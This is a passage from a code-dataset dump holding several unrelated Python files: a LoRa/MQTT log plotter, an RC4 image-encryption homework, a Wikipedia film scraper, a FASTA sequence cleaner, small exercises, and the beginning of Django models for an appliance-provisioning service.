print(\"file:%s found\\n\"%file)\n return 1\n else:\n print(\"File:%s not found\\n\"%file)\n return -1\n\n\ndef parserFunct(file):\n\tregex2 = r'(.*)Device ID:(.*)'\n\tregex3 = r'(.*)Msg Time: (.*)'\n\tdev2 = []\n\tdev1 = []\n\n\tval1 = []\n\tval2 = []\n\titr1 = 0\n\titr2 = 0\n\n\tif fileExists(file) != -1:\n\t\twith open(file,'r') as file:\n\t\t\tfor line in file:\n\t\t\t\tif \"00-80-00-00-00-00-fe-37\" in line:\n\t\t\t\t\tobj = re.search(regex3,line,re.M|re.I)\n\t\t\t\t\t#print(obj);\n\t\t\t\t\tres = obj.group(2);\n\t\t\t\t\t# print(\"res.split()[0]:{}\".format(res.split()[0]))\n\t\t\t\t\ttp = dp.parse(res.split()[0])\n\t\t\t\t\tt_sec = tp.strftime('%s')\n\t\t\t\t\tdev1.append(t_sec)\n\t\t\t\t\titr1 += 1\n\t\t\t\telif \"00-80-00-00-00-00-fe-36\" in line:\n\t\t\t\t\tobj = re.search(regex3,line,re.M|re.I)\n\t\t\t\t\t#print(obj);\n\t\t\t\t\tres = obj.group(2);\n\t\t\t\t\t# print(\"res.split()[0]:{}\".format(res))\n\t\t\t\t\ttp = dp.parse(res.split()[0])\n\t\t\t\t\tt_sec = tp.strftime('%s')\n\t\t\t\t\tdev2.append(t_sec)\n\t\t\t\t\titr2 += 1\n\t\treturn dev1,dev2\n\telse:\n\t\treturn False\n\n'''\n# this is for the toa item in the marconi log file\n'''\ndef parserFunctToa(file,devList):\n\n\tregex_dev_toa = r'(.*)TOA:(.*)'\n\n\tdev1_val = []\n\tdev2_val = []\n\t#time_val = []\n\titr = 0;\n\tif fileExists(file) != -1:\n\t\twith open(file,'r') as file:\n\t\t\tfor line in file:\n\t\t\t\tif devList[0] in line and \"TOA\" in line:\n\t\t\t\t\tobj = re.search(regex_dev_msg_rx,line,re.M|re.I)\n\t\t\t\t\tres = obj.group(2)\n\t\t\t\t\tdev1_val.append(int(res.split()[0]))\n\t\t\t\telif devList[1] in line and \"TOA\" in line:\n\t\t\t\t\t#elif devList[1] in line and \"TOA\" in line:\n\t\t\t\t\t#obj = re.search(regex_dev_toa,line,re.M|re.I)\n\t\t\t\t\tobj = re.search(regex_dev_msg_rx,line,re.M|re.I)\n\t\t\t\t\tres = obj.group(2)\n\t\t\t\t\tdev2_val.append(int(res.split()[0]))\n\t\treturn (dev1_val,dev2_val)\n\telse:\n\t\treturn False\n\n'''\nTo plot the mqtt_sub timestamps\n'''\ndef creatTimeList(file,devEUIs):\n regex_dev_sub_time = r'(.*)Msg Time:(.*)'\n\n timeList_dev1 = []\n timeList_dev2 = []\n\n itr = 0\n itr2 = 0\n val = 0\n\n with open(file,'r') as fp:\n for line in fp:\n \tif devEUIs[0] in line:\n \t\tobj = re.search(regex_dev_sub_time,line,re.M|re.I)\n \t\tres = obj.group(2)\n\n \t\ttimeList_dev1.append(int(res.split()[0]))\n\t\t if itr == 0:\n\t\t val = timeList_dev1[0]\n\t\t #print(\"dev:{}\".format(res.split()[0]))\n\t\t timeList_dev1[itr] -= val\n\t\t itr += 1\n\n\t elif devEUIs[1] in line:\n\t \tobj = re.search(regex_dev_sub_time,line,re.M|re.I)\n\t \tres = obj.group(2)\n\t \ttimeList_dev2.append(int(res.split()[0]))\n\t \tif itr2 == 0:\n\t \t\tval = timeList_dev2[0]\n\t \ttimeList_dev2[itr2] -= val\n\t \titr2 += 1\n\n return timeList_dev1,timeList_dev2\n\ndef plot(filePath,devEUIs,yax,sf37,sf36):\n\tretFlag = 0\n\t#retFlag += fileExists(filePath[0])\n\tretFlag += fileExists(filePath[1])\n\n\tif retFlag < 1:\n\t\treturn -1\n\n\t#timeList1 = creatTimeList(filePath[0])\n\ttimeList_dev1,timeList_dev2 = creatTimeList(filePath[1],devEUIs)\n\n\t#timeList1 = np.array(timeList1)\n\ttimeList_dev1 = np.array(timeList_dev1)\n\ttimeList_dev2 = np.array(timeList_dev2)\n\n\ty_axis1 = np.array([yax[0] for i in range(len(timeList_dev1))])\n\ty_axis2 = np.array([yax[1] for i in range(len(timeList_dev2))])\n\n\tlb1 = 'mqtt sub(marconi) Dev:008000000000fe37' + ' ' + sf37\n\tlb2 = 'mqtt sub(marconi) Dev:008000000000fe36' + ' ' + sf36\n\t#fig = plt.figure(figsize=(18, 16), dpi= 100, facecolor='w', edgecolor='k')\n\t# fig = plt.figure()\n\n\t#fig.canvas.draw()\n\tplt.plot(timeList_dev1[:20], y_axis1[:20], color='r', linestyle='None', markersize = 10.0)\n\tplt.scatter(timeList_dev1[:20],y_axis1[:20],label = lb1 ,color='c')\n\tplt.plot(timeList_dev2[:20], y_axis2[:20], color='b', linestyle='None', markersize = 10.0)\n\t#plt.scatter(timeList_dev2[:20],y_axis2[:20], label = 'mqtt sub(marconi) Dev:0080000004009802',color='r')\n\tif 'NULL' not in sf36:\n\t\tplt.scatter(timeList_dev2[:20],y_axis2[:20], label = lb2,color='r')\n\n\treturn timeList_dev1,timeList_dev2\n\n\nif __name__ == '__main__':\n\n\tfilePath1 = ['/home/iot/Desktop/testJuypter/test0422/gw_tmst_0422_dr0dr1_11b.txt','/home/iot/Desktop/testJuypter/test0422/log_mqtt_marconi_sub_0422_dr0dr1_11b.txt']\n\tfilePath2 = ['/home/iot/Desktop/testJuypter/test0422/gw_tmst_0422_dr2dr3_11b.txt','/home/iot/Desktop/testJuypter/test0422/log_mqtt_marconi_sub_0422_dr2dr3_11b.txt']\n\tfilePath3 = ['/home/iot/Desktop/testJuypter/test0422/gw_tmst_0422_dr4_11b.txt','/home/iot/Desktop/testJuypter/test0422/log_mqtt_marconi_sub_0422_dr4_11b.txt']\n\n\tdevEUIs = ['00-80-00-00-00-00-fe-37','00-80-00-00-00-00-fe-36']\n\taxis_sub = [1,3]\n\taxis_gw = [2,4]\n\n\tfig = plt.figure()\n\tret1,ret2 = plot(filePath1,devEUIs,[1,3],'SF10','SF9') # mqtt sub/pub plot\n\tplot_predicted(filePath1,ret1,ret2,[2,4],'SF10','SF9')\n\tret1,ret2 = plot(filePath2,devEUIs,[7,5],'SF7','SF8') # mqtt sub/pub plot\n\tplot_predicted(filePath2,ret1,ret2,[8,6],'SF7','SF8')\n\tret1,ret2 = plot(filePath3,devEUIs,[9,0],'SF8BW500','NULL') # mqtt sub/pub plot\n\tplot_predicted(filePath3,ret1,ret2,[10,0],'SF8BW500','NULL')\n\n\tplt.rcParams.update({'font.size': 12})\n\tplt.title('Gateway Rx Time vs mqtt sub(marconi) time for dev:008000000000fe36 and dev:008000000000fe37 @11B PL operating at different Data Rates [DR0-DR4]')\n\tplt.rcParams.update({'font.size': 16})\n\ttext_str = 'Data Transfer Path: mdot Tx -> Gateway Rx -> Gateway MQTT pub -> marconi MQTT sub\\n'\n\tfig.text(.5,0.01,text_str,wrap=True,ha='center')\n\n\tplt.gca().legend(loc='best')\n\tplt.gca().yaxis.set_major_locator (plt.NullLocator())\n\tplt.grid(True)\n\tplt.show()\n","sub_path":"test_and_plots_0422/plotGwRxMqttSub_11b.py","file_name":"plotGwRxMqttSub_11b.py","file_ext":"py","file_size_in_byte":7959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"302453354","text":"t = int(input())\nfor i in range(t):\n inp = input()\n flaga = False\n flagb = False\n flagc = False\n for j in inp:\n if(j == 'c'):\n flagc = True\n if(j == 'a'):\n flaga = True\n if(j == 'b'):\n flagb = True\n if(flaga and flagb and flagc):\n if(len(inp) == 4):\n print(3)\n elif(len(inp) == 6):\n print(7)\n else:\n print(1)\n else:\n print(0)\n ","sub_path":"Code/CodeRecords/2674/47920/283694.py","file_name":"283694.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"103700205","text":"#!/usr/bin/env python2.7\n\n# HW 5\n# Eric Murphy\n# murph141\n# 2/24/15\n\n# Imports\nimport sys\nimport os\nfrom copy import deepcopy\n\nsys.path.append( \"../BitVector/\" )\n\nfrom BitVector import *\n\noriginalImage = 'Tiger2.ppm'\nencryptedImage = 'Encrypted.ppm'\ndecryptedImage = 'Decrypted.ppm'\n\nclass RC4():\n def __init__(self, key):\n self.header = \"\"\n\n T_table = [ord(key[a % len(key)]) for a in range(256)]\n S = [x for x in range(256)]\n\n j = 0\n for i in range(256):\n j = (j + S[i] + T_table[i]) % 256\n S[i], S[j] = S[j], S[i]\n\n self.S = S\n \n\n def encrypt(self, image):\n self.header = \"\"\n\n with open(image, 'rb') as f:\n for l in range(5):\n self.header = self.header + f.readline()\n\n data = f.read()\n\n output = \"\"\n\n i = 0\n j = 0\n\n Q = deepcopy(self.S)\n\n for char in data:\n i = (i + 1) % 256\n j = (j + Q[i]) % 256\n Q[i], Q[j] = Q[j], Q[i]\n k = (Q[i] + Q[j]) % 256\n output = output + chr(Q[k] ^ ord(char))\n\n f = open(encryptedImage, \"wb\")\n \n f.write(self.header)\n\n f.write(output)\n\n f.close()\n\n\n def decrypt(self, image):\n self.header = \"\"\n\n with open(image, 'rb') as f:\n for l in range(5):\n self.header = self.header + f.readline()\n\n data = f.read()\n\n output = \"\"\n\n i = 0\n j = 0\n\n Q = deepcopy(self.S)\n\n for char in data:\n i = (i + 1) % 256\n j = (j + Q[i]) % 256\n Q[i], Q[j] = Q[j], Q[i]\n k = (Q[i] + Q[j]) % 256\n output = output + chr(Q[k] ^ ord(char))\n\n f = open(decryptedImage, \"wb\")\n \n f.write(self.header)\n\n f.write(output)\n\n f.close()\n\n\nif __name__ == \"__main__\":\n rc = RC4('123451234512345')\n rc.encrypt(originalImage)\n rc.decrypt(encryptedImage)\n","sub_path":"HW05/bak.py","file_name":"bak.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"306264599","text":"import csv \nfrom urllib.request import urlopen \nfrom bs4 import BeautifulSoup\nimport re\n\nstartYear = 2011\nendYear = 2015\n\ndef monthToNum(month):\n\tif month == \"JANUARY\":\n\t\treturn 1\n\tif month == \"FEBRUARY\":\n\t\treturn 2\n\tif month == \"MARCH\":\n\t\treturn 3\n\tif month == \"APRIL\":\n\t\treturn 4\n\tif month == \"MAY\":\n\t\treturn 5\n\tif month == \"JUNE\":\n\t\treturn 6\n\tif month == \"JULY\":\n\t\treturn 7\n\tif month == \"AUGUST\":\n\t\treturn 8\n\tif month == \"SEPTEMBER\":\n\t\treturn 9\n\tif month == \"OCTOBER\":\n\t\treturn 10\n\tif month == \"NOVEMBER\":\n\t\treturn 11\n\tif month == \"DECEMBER\":\n\t\treturn 12\n\treturn month\n\ndef cellsToArray7(cells, monthCell, dayCell):\n\tcsvRow = []\n\n\tif len(cells) is 7:\n\t\tmonthCell = monthToNum(cells[0].get_text().replace('\\n',\"\"))\n\t\tdayCell = cells[1].get_text()\n\t\tcsvRow.append(year)\n\tif len(cells) is 6:\n\t\tdayCell = cells[0].get_text()\n\t\tcsvRow.append(year)\n\t\tcsvRow.append(monthCell)\n\tif len(cells) is 5:\n\t\tcsvRow.append(year)\n\t\tcsvRow.append(monthCell)\n\t\tcsvRow.append(dayCell)\n\n\tfor cell in cells:\n\t\tformattedRow = monthToNum(cell.get_text().replace('\\n',\"\"))\n\t\tcsvRow.append(formattedRow)\n\n\treturn {\"csvRow\": csvRow, \"monthCell\": monthCell, \"dayCell\": dayCell}\n\ndef cellsToArray8(cells, monthCell, dayCell):\n\tcsvRow = []\n\n\tif len(cells) is 9:\n\t\tmonthCell = monthToNum(cells[0].get_text().replace('\\n',\"\"))\n\t\tdayCell = cells[1].get_text()\n\t\tcsvRow.append(year)\n\t\tcsvRow.append(monthCell)\n\t\tcsvRow.append(dayCell)\n\t\tcsvRow.append(cells[3].get_text())\n\t\tcsvRow.append(cells[4].get_text())\n\t\tcsvRow.append(cells[5].get_text())\n\t\tcsvRow.append(cells[6].get_text()+\", \"+cells[7].get_text())\n\tif len(cells) is 8:\n\t\tdayCell = cells[0].get_text()\n\t\tcsvRow.append(year)\n\t\tcsvRow.append(monthCell)\n\t\tcsvRow.append(dayCell)\n\t\tcsvRow.append(cells[2].get_text())\n\t\tcsvRow.append(cells[3].get_text())\n\t\tcsvRow.append(cells[4].get_text())\n\t\tcsvRow.append(cells[5].get_text()+\", \"+cells[6].get_text())\n\tif len(cells) is 7:\n\t\tcsvRow.append(year)\n\t\tcsvRow.append(monthCell)\n\t\tcsvRow.append(dayCell)\n\t\tcsvRow.append(cells[1].get_text())\n\t\tcsvRow.append(cells[2].get_text())\n\t\tcsvRow.append(cells[3].get_text())\n\t\tcsvRow.append(cells[4].get_text()+\", \"+cells[5].get_text())\n\tif len(cells) is 6:\n\t\tcsvRow.append(year)\n\t\tcsvRow.append(monthCell)\n\t\tcsvRow.append(dayCell)\n\t\tcsvRow.append(cells[0].get_text())\n\t\tcsvRow.append(cells[1].get_text())\n\t\tcsvRow.append(cells[2].get_text())\n\t\tcsvRow.append(cells[3].get_text()+\", \"+cells[4].get_text())\n\n\treturn {\"csvRow\": csvRow, \"monthCell\": monthCell, \"dayCell\": dayCell}\n\nyears = list(range(startYear,endYear+1))\n\ncsvFile = open(\"./film2.csv\", 'wt') \nwriter = csv.writer(csvFile)\n\nfor year in years:\n\tprint(\"Starting year \"+str(year)+\"...\")\n\thtml = urlopen(\"https://en.wikipedia.org/wiki/\"+str(year)+\"_in_film\") \n\tbsObj = BeautifulSoup(html, \"html.parser\") \n\t#The main comparison table is currently the first table on the page \n\ttables = []\n\ttable = bsObj.find(\"span\",{\"id\":re.compile(\"[0-9][0-9][0-9][0-9]_films\")}).parent.findNext(\"table\",{\"class\":\"wikitable\"})\n\twhile table is not None:\n\t\ttables.append(table)\n\t\ttable = table.findNext(\"table\",{\"class\":\"wikitable\"})\n\n\tallrows =[]\n\tfor table in tables:\n\t\trows = table.findAll(\"tr\")\n\t\tfor row in rows:\n\t\t\tallrows.append(row)\n\n\tmonthCell = \"\"\n\tdayCell = \"\"\n\tfor row in allrows:\n\t\tcells = row.findAll(['td', 'th'])\n\t\t\n\t\tcsvRow = []\n\t\tif year == 2012:\n\t\t\treturnedTuple = cellsToArray8(cells, monthCell, dayCell)\n\t\t\tcsvRow = returnedTuple[\"csvRow\"]\n\t\t\tmonthCell = returnedTuple[\"monthCell\"]\n\t\t\tdayCell = returnedTuple[\"dayCell\"]\n\t\telse:\n\t\t\treturnedTuple = cellsToArray7(cells, monthCell, dayCell)\n\t\t\tcsvRow = returnedTuple[\"csvRow\"]\n\t\t\tmonthCell = returnedTuple[\"monthCell\"]\n\t\t\tdayCell = returnedTuple[\"dayCell\"]\n\n\t\tif len(csvRow) >= 2:\n\t\t\tif csvRow[2] == 'Opening':\n\t\t\t\tif year is years[0] and row is allrows[0]:\n\t\t\t\t\tcsvRow[0]=\"\"\n\t\t\t\t\ttry:\n\t\t\t\t\t\twriter.writerow(csvRow) \n\t\t\t\t\texcept: \n\t\t\t\t\t\tcsvFile.close()\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\twriter.writerow(csvRow)\n\t\t\t\texcept:\n\t\t\t\t\tcsvFile.close()\t\nprint(\"Done.\")\ncsvFile.close()","sub_path":"scrapeFilms2015.py","file_name":"scrapeFilms2015.py","file_ext":"py","file_size_in_byte":3981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"514236190","text":"from Bio import SeqIO, SeqRecord\nimport sys, os\n\ndef remove_sequences_with_nonbases(infile):\n bases = ['A', 'C', 'T', 'G', 'a', 'c', 't', 'g']\n in_handle = open(infile, \"r\")\n records = list (SeqIO.parse(in_handle, \"fasta\"))\n new_records = []\n for record in records:\n keep = True\n for base in record.seq:\n if base not in bases:\n keep = False\n break\n if keep:\n new_records.append(record)\n\n SeqIO.write(new_records, 'cleaned_nucleotide.fasta', 'fasta')\n\n return 0\n\ndef main():\n infile = sys.argv[1]\n remove_sequences_with_nonbases(infile)\n\nmain()\n","sub_path":"sequence_data/17/remove_noncanonical_bases.py","file_name":"remove_noncanonical_bases.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"47035168","text":"# print('Hey!')\n# print('I don\\'t know your name')\n# name = input(\"What is your name? - \")\n# print('Happy to see you,', name)\n#\n# usd = 23\n#\n# number = int(input('How many you want to exchange? - '))\n#\n# cash = round(number / usd, 2)\n# print('You receive', cash, ' of cash')\n\n\nprint('Let\\'s find factorial')\nnumber = int(input('Give me a number: '))\n\ni = 2\nfactorial = 1\nwhile i <= number:\n factorial *= i\n i += 1\nprint('Hey bro your factorial is: ', factorial)","sub_path":"NewOne/Hey.py","file_name":"Hey.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"300146739","text":"# -*- coding: utf-8 -*-\nimport yaml\n\nfrom celery import chain\nfrom contextlib import contextmanager\nfrom datetime import timedelta, date\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import models, transaction\nfrom django.utils import timezone\n\nfrom sprout import critical_section\nfrom sprout.log import create_logger\n\nfrom utils import mgmt_system\nfrom utils.appliance import Appliance as CFMEAppliance, IPAppliance\nfrom utils.conf import cfme_data\nfrom utils.providers import get_mgmt\nfrom utils.timeutil import nice_seconds\nfrom utils.version import Version\n\n\n# Monkey patch the User object in order to have nicer checks\ndef has_quotas(self):\n try:\n self.quotas\n except ObjectDoesNotExist:\n return False\n else:\n return True\n\nUser.has_quotas = property(has_quotas)\n\n\ndef apply_if_not_none(o, meth, *args, **kwargs):\n if o is None:\n return None\n return getattr(o, meth)(*args, **kwargs)\n\n\nclass MetadataMixin(models.Model):\n class Meta:\n abstract = True\n object_meta_data = models.TextField(default=yaml.dump({}))\n\n def reload(self):\n new_self = self.__class__.objects.get(pk=self.pk)\n self.__dict__.update(new_self.__dict__)\n\n @property\n @contextmanager\n def metadata_lock(self):\n with critical_section(\"metadata-({})[{}]\".format(self.__class__.__name__, str(self.pk))):\n yield\n\n @property\n def metadata(self):\n return yaml.load(self.object_meta_data)\n\n @metadata.setter\n def metadata(self, value):\n if not isinstance(value, dict):\n raise TypeError(\"You can store only dict in metadata!\")\n self.object_meta_data = yaml.dump(value)\n\n @property\n @contextmanager\n def edit_metadata(self):\n with transaction.atomic():\n with self.metadata_lock:\n o = type(self).objects.get(pk=self.pk)\n metadata = o.metadata\n yield metadata\n o.metadata = metadata\n o.save()\n self.reload()\n\n @property\n def logger(self):\n return create_logger(self)\n\n @classmethod\n def class_logger(cls, id=None):\n return create_logger(cls, id)\n\n\nclass DelayedProvisionTask(MetadataMixin):\n pool = models.ForeignKey(\"AppliancePool\")\n lease_time = models.IntegerField(null=True, blank=True)\n provider_to_avoid = models.ForeignKey(\"Provider\", null=True, blank=True)\n\n def __unicode__(self):\n return u\"Task {}: Provision on {}, lease time {}, avoid provider {}\".format(\n self.id, self.pool.id, self.lease_time,\n self.provider_to_avoid.id if self.provider_to_avoid is not None else \"---\")\n\n\nclass Provider(MetadataMixin):\n id = models.CharField(max_length=32, primary_key=True, help_text=\"Provider's key in YAML.\")\n working = models.BooleanField(default=False, help_text=\"Whether provider is available.\")\n num_simultaneous_provisioning = models.IntegerField(default=5,\n help_text=\"How many simultaneous background provisioning tasks can run on this provider.\")\n num_simultaneous_configuring = models.IntegerField(default=1,\n help_text=\"How many simultaneous template configuring tasks can run on this provider.\")\n appliance_limit = models.IntegerField(\n null=True, help_text=\"Hard limit of how many appliances can run on this provider\")\n\n @property\n def api(self):\n return get_mgmt(self.id)\n\n @property\n def num_currently_provisioning(self):\n return len(\n Appliance.objects.filter(\n ready=False, marked_for_deletion=False, template__provider=self, ip_address=None))\n\n @property\n def num_templates_preparing(self):\n return len(Template.objects.filter(provider=self, ready=False))\n\n @property\n def remaining_configuring_slots(self):\n result = self.num_simultaneous_configuring - self.num_templates_preparing\n if result < 0:\n return 0\n return result\n\n @property\n def remaining_appliance_slots(self):\n if self.appliance_limit is None:\n return 1\n result = self.appliance_limit - self.num_currently_managing\n if result < 0:\n return 0\n return result\n\n @property\n def num_currently_managing(self):\n return len(Appliance.objects.filter(template__provider=self))\n\n @property\n def currently_managed_appliances(self):\n return Appliance.objects.filter(template__provider=self)\n\n @property\n def remaining_provisioning_slots(self):\n result = self.num_simultaneous_provisioning - self.num_currently_provisioning\n if result < 0:\n return 0\n # Take the appliance limit into account\n if self.appliance_limit is None:\n return result\n else:\n free_appl_slots = self.appliance_limit - self.num_currently_managing\n if free_appl_slots < 0:\n free_appl_slots = 0\n return min(free_appl_slots, result)\n\n @property\n def free(self):\n return self.remaining_provisioning_slots > 0\n\n @property\n def provisioning_load(self):\n if self.num_simultaneous_provisioning == 0:\n return 1.0 # prevent division by zero\n return float(self.num_currently_provisioning) / float(self.num_simultaneous_provisioning)\n\n @property\n def appliance_load(self):\n if self.appliance_limit is None or self.appliance_limit == 0:\n return 0.0\n return float(self.num_currently_managing) / float(self.appliance_limit)\n\n @property\n def load(self):\n \"\"\"Load for sorting\"\"\"\n if self.appliance_limit is None:\n return self.provisioning_load\n else:\n return self.appliance_load\n\n @classmethod\n def get_available_provider_keys(cls):\n return cfme_data.get(\"management_systems\", {}).keys()\n\n @property\n def provider_data(self):\n return cfme_data.get(\"management_systems\", {}).get(self.id, {})\n\n @property\n def ip_address(self):\n return self.provider_data.get(\"ipaddress\")\n\n @property\n def templates(self):\n return self.metadata.get(\"templates\", [])\n\n @templates.setter\n def templates(self, value):\n with self.edit_metadata as metadata:\n metadata[\"templates\"] = value\n\n @property\n def template_name_length(self):\n return self.metadata.get(\"template_name_length\", None)\n\n @template_name_length.setter\n def template_name_length(self, value):\n with self.edit_metadata as metadata:\n metadata[\"template_name_length\"] = value\n\n @property\n def appliances_manage_this_provider(self):\n return self.metadata.get(\"appliances_manage_this_provider\", [])\n\n @appliances_manage_this_provider.setter\n def appliances_manage_this_provider(self, value):\n with self.edit_metadata as metadata:\n metadata[\"appliances_manage_this_provider\"] = value\n\n @property\n def g_appliances_manage_this_provider(self):\n for appl_id in self.appliances_manage_this_provider:\n try:\n yield Appliance.objects.get(id=appl_id)\n except ObjectDoesNotExist:\n continue\n\n @property\n def user_usage(self):\n per_user_usage = {}\n for appliance in Appliance.objects.filter(template__provider=self):\n if appliance.owner is None:\n continue\n owner = appliance.owner.username\n if owner not in per_user_usage:\n per_user_usage[owner] = 1\n else:\n per_user_usage[owner] += 1\n per_user_usage = per_user_usage.items()\n per_user_usage.sort(key=lambda item: item[1], reverse=True)\n return per_user_usage\n\n @property\n def free_shepherd_appliances(self):\n return Appliance.objects.filter(\n template__provider=self, appliance_pool=None, marked_for_deletion=False, ready=True)\n\n @classmethod\n def complete_user_usage(cls):\n result = {}\n for provider in cls.objects.all():\n for username, count in provider.user_usage:\n if username not in result:\n result[username] = 0\n result[username] += count\n result = result.items()\n result.sort(key=lambda item: item[1], reverse=True)\n return result\n\n def cleanup(self):\n \"\"\"Put any cleanup tasks that might help the application stability here\"\"\"\n self.logger.info(\"Running cleanup on provider {}\".format(self.id))\n if isinstance(self.api, mgmt_system.OpenstackSystem):\n # Openstack cleanup\n # Clean up the floating IPs\n for floating_ip in self.api.api.floating_ips.findall(fixed_ip=None):\n self.logger.info(\n \"Cleaning up the {} floating ip {}\".format(self.id, floating_ip.ip))\n try:\n floating_ip.delete()\n except Exception as e:\n self.logger.exception(e)\n\n def vnc_console_link_for(self, appliance):\n if appliance.uuid is None:\n return None\n if isinstance(self.api, mgmt_system.OpenstackSystem):\n return \"http://{}/dashboard/project/instances/{}/?tab=instance_details__console\".format(\n self.ip_address, appliance.uuid\n )\n else:\n return None\n\n def __unicode__(self):\n return \"{} {}\".format(self.__class__.__name__, self.id)\n\n\nclass Group(MetadataMixin):\n id = models.CharField(max_length=32, primary_key=True,\n help_text=\"Group name as trackerbot says. (eg. upstream, downstream-53z, ...)\")\n template_pool_size = models.IntegerField(default=0,\n help_text=\"How many appliances to keep spinned for quick taking.\")\n unconfigured_template_pool_size = models.IntegerField(default=0,\n help_text=\"How many appliances to keep spinned for quick taking - unconfigured ones.\")\n template_obsolete_days = models.IntegerField(\n null=True, blank=True, help_text=\"Templates older than X days won't be loaded into sprout\")\n template_obsolete_days_delete = models.BooleanField(\n default=False,\n help_text=\"If template_obsolete_days set, this will enable deletion of obsolete templates\"\n \" using that metric. WARNING! Use with care. Best use for upstream templates.\")\n\n @property\n def obsolete_templates(self):\n \"\"\"Return a list of obsolete templates. Ignores the latest one even if it was obsolete by\n the means of days.\"\"\"\n if self.template_obsolete_days is None:\n return None\n latest_template_date = Template.objects.filter(\n exists=True, template_group=self).order_by(\"-date\")[0].date\n latest_template_ids = [\n tpl.id\n for tpl\n in Template.objects.filter(exists=True, template_group=self, date=latest_template_date)]\n return Template.objects.filter(\n exists=True, date__lt=date.today() - timedelta(days=self.template_obsolete_days),\n template_group=self).exclude(id__in=latest_template_ids).order_by(\"date\")\n\n @property\n def templates(self):\n return Template.objects.filter(template_group=self).order_by(\"-date\", \"provider__id\")\n\n @property\n def existing_templates(self):\n return self.templates.filter(exists=True)\n\n @property\n def appliances(self):\n return Appliance.objects.filter(template__template_group=self)\n\n def shepherd_appliances(self, preconfigured=True):\n return self.appliances.filter(\n appliance_pool=None, ready=True, marked_for_deletion=False,\n template__preconfigured=preconfigured)\n\n @property\n def configured_shepherd_appliances(self):\n return self.shepherd_appliances(True)\n\n @property\n def unconfigured_shepherd_appliances(self):\n return self.shepherd_appliances(False)\n\n def get_fulfillment_percentage(self, preconfigured):\n \"\"\"Return percentage of fulfillment of the group shepherd.\n\n Values between 0-100, can be over 100 if there are more than required.\n\n Args:\n preconfigured: Whether to check the pure ones or configured ones.\n \"\"\"\n appliances_in_shepherd = len(\n self.appliances.filter(\n template__preconfigured=preconfigured, appliance_pool=None,\n marked_for_deletion=False))\n wanted_pool_size = (\n self.template_pool_size if preconfigured else self.unconfigured_template_pool_size)\n if wanted_pool_size == 0:\n return 100\n return int(round((float(appliances_in_shepherd) / float(wanted_pool_size)) * 100.0))\n\n def __unicode__(self):\n return \"{} {} (pool size={}/{})\".format(\n self.__class__.__name__, self.id, self.template_pool_size,\n self.unconfigured_template_pool_size)\n\n\nclass Template(MetadataMixin):\n provider = models.ForeignKey(Provider, help_text=\"Where does this template reside\")\n template_group = models.ForeignKey(Group, help_text=\"Which group the template belongs to.\")\n version = models.CharField(max_length=16, null=True, help_text=\"Downstream version.\")\n date = models.DateField(help_text=\"Template build date (original).\")\n\n original_name = models.CharField(max_length=64, help_text=\"Template's original name.\")\n name = models.CharField(max_length=64, help_text=\"Template's name as it resides on provider.\")\n\n status = models.TextField(default=\"Template inserted into the system\")\n status_changed = models.DateTimeField(auto_now_add=True)\n ready = models.BooleanField(default=False, help_text=\"Template is ready-to-be-used\")\n exists = models.BooleanField(default=True, help_text=\"Template exists in the provider.\")\n usable = models.BooleanField(default=False, help_text=\"Template is marked as usable\")\n\n preconfigured = models.BooleanField(default=True, help_text=\"Is prepared for immediate use?\")\n\n @property\n def provider_api(self):\n return self.provider.api\n\n @property\n def provider_name(self):\n return self.provider.id\n\n @property\n def exists_in_provider(self):\n return self.name in self.provider_api.list_template()\n\n def set_status(self, status):\n with transaction.atomic():\n template = Template.objects.get(id=self.id)\n template.status = status\n template.status_changed = timezone.now()\n template.save()\n self.logger.info(\"{}: {}\".format(self.pk, status))\n\n @property\n def cfme(self):\n return CFMEAppliance(self.provider_name, self.name)\n\n @property\n def can_be_deleted(self):\n return self.exists and self.preconfigured and len(self.appliances) == 0\n\n @property\n def appliances(self):\n return Appliance.objects.filter(template=self)\n\n @property\n def temporary_name(self):\n return self.metadata.get(\"temporary_name\", None)\n\n @temporary_name.setter\n def temporary_name(self, name):\n with self.edit_metadata as metadata:\n metadata[\"temporary_name\"] = name\n\n @temporary_name.deleter\n def temporary_name(self):\n with self.edit_metadata as metadata:\n if \"temporary_name\" in metadata:\n del metadata[\"temporary_name\"]\n\n @classmethod\n def get_versions(cls, **filters):\n versions = []\n for version in cls.objects.filter(**filters).values('version').distinct():\n v = version.values()[0]\n if v is not None:\n versions.append(v)\n versions.sort(key=Version, reverse=True)\n return versions\n\n @classmethod\n def get_dates(cls, **filters):\n dates = map(\n lambda d: d.values()[0],\n cls.objects.filter(**filters).values('date').distinct())\n dates.sort(reverse=True)\n return dates\n\n def __unicode__(self):\n return \"{} {}:{} @ {}\".format(\n self.__class__.__name__, self.version, self.name, self.provider.id)\n\n\nclass Appliance(MetadataMixin):\n class Power(object):\n ON = \"on\"\n OFF = \"off\"\n SUSPENDED = \"suspended\"\n REBOOTING = \"rebooting\"\n LOCKED = \"locked\"\n UNKNOWN = \"unknown\"\n ORPHANED = \"orphaned\"\n\n POWER_STATES_MAPPING = {\n # vSphere\n \"poweredOn\": Power.ON,\n \"poweredOff\": Power.OFF,\n \"suspended\": Power.SUSPENDED,\n # RHEV\n \"up\": Power.ON,\n \"down\": Power.OFF,\n \"suspended\": Power.SUSPENDED,\n \"image_locked\": Power.LOCKED,\n # Openstack\n \"ACTIVE\": Power.ON,\n \"SHUTOFF\": Power.OFF,\n \"SUSPENDED\": Power.SUSPENDED,\n # SCVMM\n \"Running\": Power.ON,\n \"PoweredOff\": Power.OFF,\n \"Stopped\": Power.OFF,\n \"Paused\": Power.SUSPENDED,\n # EC2 (for VM manager)\n \"stopped\": Power.OFF,\n \"running\": Power.ON,\n }\n template = models.ForeignKey(Template, help_text=\"Appliance's source template.\")\n 